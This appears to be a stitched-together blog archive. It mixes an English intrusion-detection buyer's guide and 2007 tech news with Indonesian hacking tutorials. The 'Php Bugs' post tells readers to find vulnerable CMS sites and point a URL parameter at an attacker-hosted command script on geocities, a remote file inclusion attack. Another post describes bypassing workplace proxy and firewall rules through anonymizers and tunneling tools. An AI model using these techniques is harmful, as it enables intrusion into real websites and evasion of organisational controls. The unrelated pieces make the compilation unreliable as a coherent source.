That's the problem. You can have all this security, and all you've really got is a false sense of security. If anything or anyone does get through these defenses, through the legitimate holes, it or they can live on your network, doing whatever they want for as long as they want. And then there's a whole raft of little known vulnerabilities, known to the criminals, who can exploit them and gain access for fun, profit or malevolence. A hacker will quietly change your system and leave a back door so that he can come and go undetected whenever he wants. A Trojan might be designed to hide itself, silently gather sensitive information and secretly mail it back to source. And you won't even know it's happening - worse, you'll believe it can't be happening because you've got a firewall, anti-virus and access control.

Unless, that is, you also have an intrusion detection system. While those other defenses are there to stop bad things getting onto your network, an intrusion detection system is there to find and defeat anything that might just slip through and already be on your system. And in today's world, you really must assume that things will slip through - because they most certainly will. From the outside, you will be threatened by indiscriminate virus storms; from hackers doing it for fun (or training); and more worryingly from organized criminals specifically targeting you for extortion, blackmail or saleable trade secrets.

From the inside, you will have walk-in criminals using social engineering skills to obtain passwords to, or even use of, your own PCs; from curious staff who simply want to see what their colleagues are earning; and from malcontents with a grievance.

What you really mustn't assume is that this is fanciful, or that you don't have anything worth stealing. According to experts in the field even something as basic as stored HR data on your employees is worth $10 per person on the black market. Search for 'FBI' on this site, and see the variety of attacks and dangers that exist; and how often there is a degree of success despite firewalls and anti-virus and access control. You still need all of those defenses - but you also need an intrusion detection system.
What do I need in IDS?

Intrusion detection describes the intention - not the methodology. There are several different ways by which this can be achieved; so anything that detects intrusions is an IDS. Which method you choose really depends upon what you need: and if you don't already have in-house security expertise, it would be worth employing a consultant to help reach your decision.

Note that IDS is no longer a new technology - it's a mature technology. Since the term is no longer new, it no longer has that 'buzz' required by marketing managers. This has been aggravated by analyst firm the Gartner Group proclaiming that IDS is dead and replaced by IPS. This is wrong. Ignore it. IPS is different to IDS. Vend ors and security experts know this, but the result is that manufacturers are tempted to find new terms - and one of these is Network Behavior Analysis. This is a good and useful approach; but one of the primary purposes of NBA is to detect intrusions – in other words, IDS.

Remember, too, that good security is the right level of security for you. You need to strike the right balance between the cost of the security and the value of your goods - there's no point in spending more on security than the value of what you're protecting. Risk management principles using a thorough risk analysis will help you decide how much to spend.

Armed with this information, you can look for features such as:

* attack halting (stops the attack, whether it is a program or a hacker)
* attack blocking (closes the loop-hole through which the attacker gained access)
* attack alerting (either pop-up to an online admin, or email or SMS to a remote admin)
* information collecting (on what is done by the attack to the network, and from where the attack came - helps gather forensic evidence should a prosecution become necessary or possible)
* full reporting (so that you can learn from your mistakes, and prevent future problems)
* fail-safe features (such as encrypted messages and VPN tunneling within the IDS to hide its presence from, and inhibit interference by, any hacker).

If you've got a large network, or particularly valuable information, you may like to look out for the extras offered with some intrusion detection systems:

* honeypot or padded cell (a fake network or area designed specifically to attract and contain attacks, so that you can analyze them and learn from their behavior)
* vulnerability analysis (so that you can check your network for all known vulnerabilities in order to pre-empt rather than just detect intrusions)
* file integrity checker (a mathematical way of knowing if a file has been altered in any way, and therefore potentially compromised by an intruder)

One other point - don't think that you're so small you don't need or can't find an IDS. IDS as described above is available for large enterprises on down. But even if you just have a couple of PCs, you can still get, and still need, an intrusion detection system. It's just that for a single desktop system it goes by different names and has less automated features: it's a personal firewall and an anti-spyware program. The purpose is the same - to detect and stop intrusions - it's just that here you have to manually keep it up to date and manually conduct regular scans and it isn’t as intelligent or sophisticated.
Where do I get IDS?

Here are a few suppliers to get you started - but keep checking back to this resource center, because we'll be adding more companies and more products all the time:

* AirDefense
* Arbor Networks
* CounterStorm
* Enterasys
* GFI
* ISS
* Lancope
* Snort
* SonicWALL
* StillSecure

It will also be worth looking at Unified Threat Management. This is often a physical device, an appliance, and it just means that you get more than one security feature in a single box. Unified Threat Management will frequently include an IDS.
How can I evaluate IDS?

The first thing you need to do is to make sure that you know what you need, and what you can afford. Then you need to know what's available. Only then can you decide what to get. So first check the Buyer's Guide in this resource centre to see what you can get. Conduct a risk analysis exercise - use a consultant if you need to. And then, knowing what is available and what you need, consult our Comparison Guide and see what product comes closest to that need. And if you have specific queries, problems or worries - get some free help and advice from Ask the Experts .

Google Working To Make 'iPod/iTunes for Books'

nettamere writes to mention an initiative by Google to take the library online. The end result of the Google Book Search, the company hopes to see a future where they are not mearly referring customers to Amazon, but instead offering them the ability to download books directly. According to the Times Online, Google hopes to 'do for books what the iPod did for music'. From the article: "One of Google's partners, Evan Schnittman of Oxford University Press, said he foresaw a number of categories becoming popular downloads: 'Do you really want to go on holiday carrying four novels and a guide book?' The book initiative would be part of Google's Book Search service and its partnership with publishers, which will make books searchable online with publishers' approval. At present, only a sample of each book is available online."

Sunday, January 21, 2007

Linus Torvalds

By giving away his software, the Finnish programmer earned a place in history

By PETER GUMBEL

Linus Torvalds was just 21 when he changed the world. Working out of his family's apartment in Helsinki in 1991, he wrote the kernel of a new computer operating system called Linux that he posted



Bono & Bob Geldof
Paul Wolfowitz describes the odd couple of advocacy
Václav Havel
He wrote the script for peaceful revolution, says Lou Reed
Christiane Amanpour
She makes the news make a difference
Giovanni Falcone & Paolo Borsellino
They fought the Mafia and paid with their lives
Anna Politkovskaya
Her commitment to the truth killed her
other stories »




Get The Magazine
Try 4 issues FREE
Get unlimited access to the TIME Archive and free delivery to your door
Give a gift of TIME

for free on the Internet — and invited anyone interested to help improve it.

Today, 15 years later, Linux powers everything from supercomputers to mobile phones around the world, and Torvalds has achieved fame as the godfather of the open-source movement, in which software code is shared and developed in a collaborative effort rather than being kept locked up by a single owner.

Some of Torvalds' supporters portray him as a sort of anti-Bill Gates, but the significance of Linux is much bigger than merely a slap at Microsoft. Collaborating on core technologies could lead to a huge reduction in some business costs, freeing up money for more innovative investments elsewhere. Torvalds continues to keep a close eye on Linux's development and has made some money from stock options given to him as a courtesy by two companies that sell commercial applications for it.

But his success isn't just measured in dollars. There's an asteroid named after him, as well as an annual software-geek festival. Torvalds' parents were student radicals in the 1960s and his father, a communist, even spent a year studying in Moscow. But it's their son who has turned out to be the real revolutionary.

Saturday, January 20, 2007

Microsoft to Introduce VPN Tunneling Protocol

A new secure VPN tunneling protocol is cooking in the labs at Microsoft. The new form of VPN tunnel is called SSTP (Secure Socket Tunneling Protocol). Microsoft is scheduled to
introduce SSTP in Windows Vista Service Pack 1 and in Longhorn Server.

Currently, there are issues involving VPN connections in relation to PPTP GRE port blocking or L2TP ESP port blocking via a firewall or a NAT router, preventing the client to reach the server. Microsoft is laboring to deliver ubiquitous connectivity through VPN.

The Secure Socket Tunneling Protocol “will allow VPN tunnel connectivity across any scenarios i.e. behind NAT routers or firewalls or web proxies. And the best part of it - your end user remote access experience (like using RAS dialer) and network administration experience (like using RRAS server) remains same as before. i.e. SSTP based VPN tunnel just acts as a one more VPN tunnel that gets plugged into MS VPN client and VPN servers,” revealed Samir Jain, Lead Program Manager, RRAS, Windows Enterprise Networking, adding that the SSTP based VPN protocol will be made available as a beta together with Longhorn server Beta3.

Via the Secure Socket Tunneling Protocol (SSTP), the VPN tunnel will function over Secure-HTTP. In this manner, the problems with VPN connections based on the Point-to-Point Tunneling Protocol (PPTP) or Layer 2 Tunneling Protocol (L2TP) will be eliminated. Web proxies, firewalls and Network Address Translation (NAT) routers located on the path between clients and servers will no longer block VPN connections.

“The good part of SSTP is it integrates with MS RAS client/server infrastructure seamlessly. For example, SSTP supports password + strong user authentication (like smart-card, RSA securID, etc) using various PPP authentication algorithm. Other features of RAS (like generating profiles using connection manager administration kit, remote access policies, etc) - just works - similar to other PPTP/L2TP,” added Samir Jain.

Microsoft, Google Agree to NGO Code of Conduct

"Technology companies have come under fire for providing equipment or software that permits governments to censor information or monitor the online or offline activities of their citizens. For example, last year, Google's approach to the China market was criticized over its creation of a censored, local version of its search engine. Microsoft, Google, and two other technology companies will develop a code of conduct with a coalition of nongovernmental organizations (NGO) to promote freedom of expression and privacy rights, they announced Friday. The two companies along with Yahoo, and Vodafone Group said the new guidelines are the result of talks with Business for Social Responsibility (BSR) and the Berkman Center for Internet & Society at Harvard Law School."

Friday, March 03, 2006

Php Bugs

Pada awalnya saya menulis PhpInjection hanya untuk pengetahuan sekilas saja.Tapi tampaknya masih banyak orang yang bertanya dan tampaknya makin hari makin banyak bugs yang ditemukan. Hal ini juga dikarenakan makin banyak orang menggunakan dan mengandalkan CMS (Content management system)sebagai langkah cepat dalam membuat suatu website. Memang CMS ini membuat proses pembuatan website menjadi sangat cepat, tapi tanpa disadari hal ini membuat ada nya persamaan antara website yang satu dan yang laen.

Nah klo ada yang sama, karena dibangun diatas script yang sama maka bugs nya pun sama. Berikut ini saya akan lampirkan list bugs yang saya dapat.Buat target.

Lihat aja disini

Nah dari list yang didapat tadi maka kamu bisa memulai pencarian kamu. Setelah dapat target maka kmu ganti dech :

http://www.injection.com/cmd? menjadi http://geocities.com/k4k3_rgb/test?&cmd

Nah jadi dech dan liat hasilnya. Kalo ndak bisa berarti sudah di patch so langsung dech cari yang laen.

Friday, February 24, 2006

Mengakali Proxy Server

Nah pada suatu hari ada teman bertanya : "Mas aku kok tidak bisa buka friendster yach di kantor ku, kayaknya di blog dech di server nya ....". Kenapa hal ini bisa terjadi?Karena Proxy server dan rules pada firewall di Gateway nya.
Nah sebelum itu saya akan memberikan sedikit gambaran tentang proxy server dan Firewall Gateway.

Proxy server;
Apa itu Proxy server?Mari kita tanyakan 'Tante Wiki terlebih dulu...'
"A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server, then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
A proxy server can also serve as a firewall."

Secara singkatnya adalah server atau mesin untuk mengatur lalu lintas data dalam jaringan dan digunakan untuk menyimpan halaman web yang pernah dikunjungi dalam cache nya untuk memanage penggunaan bandwidth.Sebagai gambaran adalah alamat URL yang sudah pernah dikunjungi akan tersimpan di cache dan semua pemanggilan terhadap URL tertentu akan diarahkan pada simpanan di cache atau di tetapkan rules tertentu.Nah terkadang pada suatu instansi tertentu ditetapkan rules tertentu untuk membatasi penggunaan oleh user, yah contohnya kantor yang tidak dapat membuka www.friendster.com pada saat jam kantor, atau tidak dapat dibukanya website dengan content Pornografi dan kekerasan pada jaringan kampus atau pun sekolah.

Firewall;
Pada kesempatan sebelumnya saya sudah membahas mengenai hal yang satu ini, Lihat artikel Si Tembok Api.Nah yang intinya adalah sebuah sistem baik perangkat keras maupun perangkat lunak yang mengatur dan mencatat lalu lintas data yang keluar dan masuk dari dan ke jaringan lokal.

Nah karena ditetapkannya aturan pada kedua sistem kita inilah maka kita tidak dapat seenaknya menggunakan internet.Tapi jangan khawatir ternyata semua nya itu dapat kita akali.

1. Cara Pertama;
Nah sekali lagi semuanya itu ditetapkan berdasarkan suatu rules, yang dalam hal ini adalah ketentuan penggunaan lalu lintas dan port. Nah yang paling sederhana untuk membatasi pembatasan ini adalah dengan menggunakan anonymous server atau proxy server lain di luar Proxy atau gateway instansi kita.Mangapa hal ini memungkinkan?Karena yang dicatat adalah bahwa kita membuka hanya ke alamat URL dari anonymous browsing atau proxy tersebut sehingga URL mana yang kita tuju dari proxy atau anonymous browsing itu tidak akan terlihat pada proxy atau firewall kita.

Nah untuk contohnya coba ajah : www.guardster.com, www.freebrowsing.com, dll
Nah untuk list proxynya liat ajah di : http://familycode.atspace.com/irc.htm atau di http://www.samair.ru/proxy/socks.htm

2. Cara kedua;
Nah pada cara kedua ini adalah dengan melakukan 'tunneling' terhadap proxy server kita. Nah untuk yang satu ini diperlukan sedikit pengetahuan dan informasi.Nah sebelumnya saya sudah bilang bahwa semuanya hanyalah pengaturan lalu lintas dari data dan port apa yang digunakan.Nah cari taulah port berapa saja yang digunakan dan untuk apa. Nah lakukanlah tehnik scanning. Nah setelah kita tahu maka gunakanlah berbagai software yang tersedia di Internet untuk melakukan tunneling proxy. Jangan males yah banyak kok. Tanya ajah om GOOGLE keyword "proxy tunneling".
sebagai contohnya : InvisibleBrowsing, bypass Client, Proxyway, dll
Nah setting dech proxy yang digunakan, dan jika diperlukkan lakukan setting port yang digunakan.

Nah itulah cara ngakali Proxy pada kantor atau kampus kamu. Nah sebenarnya masih ada satu cara lagi dan cukup mudah. Ini adalah kelebihan dari Paman kita yang terkenal baik hati dan menyediakan pada kita segalanya.Ya itulah 'Om Google' kita.GOOGLE...bukan untuk searching tapi untuk jadi anonymous.Kok bisa?Nah kita gunakan salah satu fasilitasnya yaitu translate.

Coba Dech : http://translate.google.com/translate?u=

Nah sebenarnya ini adalah fasilitas GOOGLE untuk mentranslate isi website, tetapi jika tidak ada akan ditampilkan aslinya.Namun cara ini cukup kuno dan kalo admin nya pinter hal ini dapat di cegah.
Nah demikian dulu Saya berbagi informasinya.

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

Keampuhan Om Google

Setelah sekian lama tidak membuat posting baru akhirnya hari ini aku dapat melakukannya lagi. Beberapa hari lalu daku keluar kota sehingga boro2 posting, konek internet juga ndak. Nah pada kesempatan kali ini Daku ingin memberikan informasi sedikit mengenai salah satu search engine paling powerful di dunia. Mungkin sudah tidak asing lagi bagi anda menggunakannya."GOOGLE" yah itulah search engine kita. Yang memudahkan kita semua dalam mendapatkan informasi tentang apa saja di seluruh dunia dalam waktu yang singkat.Atau yang dalam panggilan akrabnya kita sering menyebut 'Om Google'.

Pada kesempatan ini saya akan memberikan sedikit tips saja untuk anda dalam menggunakan semua fasilitas google ini.
Nah langsung dech kita mulai. Untuk mengetahui fasilitas apa saja yang terdapat dalam google maka kita bisa melihat pada link :

-= http://www.google.com/intl/en/options/ =-

Itulah semua layanan yang disediakan oleh google. Nah pada posting pertama ini saya hanya akan memberikan sedikit tips dalam penggunaan Google.

1. Pertama, lakukanlah pencarian dengan detail. Dalam hal ini masukkan keyword selengkapnya sehingga pencarian dapat lebih terarah.Berikut ini saya lampirkan beberapa Google Syntax:

-. [intitle:]
Memungkinkan kita melakukan search berdasarkan title atau judul dari halam web.Google akan membatasi hasil pencarian sesuai dengan permintaan kita. Misal : "intitle:login", maka google akan menampilkan semua halaman web dengan judul atau title "login". Perlu diingat bahwa command2 tersebut hanya akan mengenali satu kata sesudahnya. Kalau kita menggunakan "intitle:login password", maka google akan menampilkan halam dengan judul atau title login dan terdapat kata password di halaman web tersebut.
Bila kita menginginkan pencarian dengan title atau judul "login password" maka kita mengetikkan "allintitle:login password".

-. [inurl:]
Memungkinkan kita melakukan pencarian pada suatu situs tertentu saja. Misal : "password inurl:www.jasakom.com", maka pencarian dengan keyword password akan dilakukan pada situs www.jasakom.com.

-. [site:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian pada site atau domain tertentu. Misal : "hacking site:co.id" akan dilakukan pencarian dengan keyword hacking pada semua site dengan domain .co.id.

-. [filetype:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian terhadapa file dengan ekstensi tertentu saja. Misal : "filetype:doc site:gov", maka akan ditampilkan semua link berisikan file dengan ekstensi .doc di domain gov.

-. [link:]
Memungkinkan pencarian untuk menampilkan halaman-halaman web yang mempunyai link ke suatu situs tertentu. Misal : "link:www.123.net", maka akan ditampilkan semua halaman situs yang mempunyai link ke www.123.net.

-. [related:]
Memungkinkan pencarian untuk menampilkan hasil-hasil yang mirip dengan web yang di spesifikasikan. Misal : "www.blackhat.com" akan menampilkan list halaman-halaman yang mirip blackhat.com.

-. [intext:]
Menampilkan hasil pencarian terhadap kata-kata tertentu, dengan mengabaikan URL serta judul dari halaman web.Misal : "intext:expoits" akan menampilkan halaman web yang ada kata-kata expoits.

-. [phonebook:]
Membantu pencarian untuk orang atau alamat.Misal : "phonebook:Anto+Bandung", maka akan ditampilkan informasi mengenai seseorang berupa alamat pada lokasi yang dicari.

Nah demikian dulu sedikit sharingnya mengenai Search Engine 'GOOGLE'.


Sumber : Buku 'Hack Attack, Konsep, Penerapan dan Pencegahan'